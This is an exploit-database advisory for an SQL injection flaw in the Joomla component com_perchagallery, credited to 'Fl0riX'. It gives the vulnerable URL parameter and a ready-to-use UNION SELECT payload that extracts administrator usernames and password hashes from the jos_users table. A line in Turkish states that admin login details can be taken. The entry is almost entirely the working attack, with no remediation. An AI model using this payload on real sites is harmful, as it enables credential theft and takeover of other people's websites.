id: 10624
date: 01/06/2010
title: Joomla Component com_perchagallery SQL Injection Vulnerability
author: Fl0riX
cves: 

==============================================================
Joomla Component com_perchagallery SQL Injection Vulnerability
==============================================================

########################################################################
# Joomla Component com_perchagallery SQL Injection Vulnerability
 
######################################################################## #
# Author :FL0RiX
#
# Name : com_perchagallery
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://localhost/index.php?option=com_perchagallery&view=editunidad&id=[EXPLOIT]
#
#EXPLOIT : null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/**/from/**/jos_users--
########################################################################



#  0day.today [2023-03-26]  #